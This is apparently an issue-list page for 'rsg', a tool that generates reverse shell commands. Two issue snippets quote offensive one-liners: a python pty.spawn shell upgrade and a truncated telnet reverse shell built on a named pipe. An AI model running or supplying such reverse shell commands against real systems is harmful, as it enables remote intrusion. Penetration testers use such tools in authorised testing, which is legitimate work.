rsg
rsg copied to clipboard
ReverShellGenerator - A tool to generate various ways to do a reverse shell
Results
12
rsg issues
Sort by
recently updated
recently updated
newest added
It is possible to use python pty module to switch the existing or new reverse shell session and have nearly terminal like experience: ``` python -c 'import pty; pty.spawn("/bin/bash")' ```...
There is: ``` TELNET REVERSE SHELL rm -f /tmp/p; mknod /tmp/p p && telnet 127.0.0.1 8080 0/tmp/p ``` While there should be something like: ``` TELNET REVERSE SHELL rm -f...